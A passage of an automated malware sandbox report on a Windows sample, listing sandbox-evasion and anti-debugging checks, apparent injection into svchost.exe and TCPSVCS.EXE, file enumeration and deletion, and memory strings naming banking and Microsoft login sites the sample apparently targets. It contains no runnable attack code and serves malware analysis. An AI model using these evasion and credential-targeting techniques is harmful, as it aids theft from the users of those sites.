                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_00661C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96059
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeAPI/Special instruction interceptor: Address: 1A6B20C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEWindow / User API: threadDelayed 9845Jump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeAPI coverage: 3.9 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 8100Thread sleep count: 125 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 8100Thread sleep time: -250000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 8100Thread sleep count: 9845 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 8100Thread sleep time: -19690000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe TID: 8108Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe TID: 8108Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\TCPSVCS.EXELast function: Thread delayed
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0063DBBE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0060C2A2 FindFirstFileExW,0_2_0060C2A2
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006468EE FindFirstFileW,FindClose,0_2_006468EE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0064698F
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0063D076
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0063D3A9
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00649642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00649642
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0064979D
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00649B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00649B2B
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00645C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00645C97
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0014C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0014C4E0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005D42DE
                Source: 164U99.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 164U99.5.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 164U99.5.dr | Binary or memory string: AMC password management pageVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 164U99.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 164U99.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 164U99.5.dr | Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3902134946.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                Source: 164U99.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 164U99.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 164U99.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
                Source: 164U99.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: firefox.exe, 0000000A.00000002.2063042888.000001B9460DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 164U99.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 164U99.5.dr | Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: 164U99.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: 164U99.5.dr | Binary or memory string: global block list test formVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 164U99.5.dr | Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 164U99.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 164U99.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 164U99.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 164U99.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7096E rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417713 LdrLoadDll
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_0064EAA2 BlockInput
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_00602622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_005D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_005F4CE8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_01A6B4D8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_01A6B478 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_01A69E08 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]2_2_03A62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]2_2_03A4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]2_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]2_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]2_2_03A64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]2_2_03A6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
